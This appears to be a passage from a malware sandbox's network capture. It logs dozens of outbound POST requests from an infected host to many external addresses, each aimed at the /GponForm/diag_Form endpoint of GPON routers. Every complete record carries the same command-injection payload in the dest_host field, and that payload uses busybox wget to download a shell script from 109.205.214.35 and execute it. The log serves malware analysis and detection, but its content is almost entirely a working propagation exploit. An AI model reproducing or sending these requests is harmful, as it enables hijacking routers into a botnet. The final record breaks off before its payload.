                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2218192.168.2.1345708212.197.114.198443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888432026 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2219192.168.2.133951242.103.24.103443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888432026 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2220192.168.2.133527042.148.72.115443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888437986 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2221192.168.2.1352364212.254.198.232443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888467073 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2222192.168.2.1355118109.71.143.230443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888468027 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2223192.168.2.13532605.18.117.196443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888473034 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2224192.168.2.1360090109.163.84.19443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888518095 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2225192.168.2.13401825.80.31.208443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888518095 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2226192.168.2.13508285.31.60.11443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888528109 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2227192.168.2.1355050109.54.49.222443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888534069 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2228192.168.2.134012442.230.44.39443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888551950 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2229192.168.2.13350045.213.197.23443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888557911 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2230192.168.2.1333986212.193.161.211443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888557911 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2231192.168.2.1337692109.160.131.111443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888576984 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2232192.168.2.1332848109.196.39.149443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888601065 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2233192.168.2.1352230118.89.255.99443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888608932 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2234192.168.2.13536625.220.22.85443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888616085 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2235192.168.2.1339958118.57.230.76443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888626099 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2236192.168.2.1352510109.210.221.120443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888658047 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2237192.168.2.1350846212.182.200.16443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888659000 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2238192.168.2.1358940109.210.177.105443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888664007 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2239192.168.2.1349172212.201.220.2443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888670921 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2240192.168.2.1342958109.152.121.187443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888680935 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
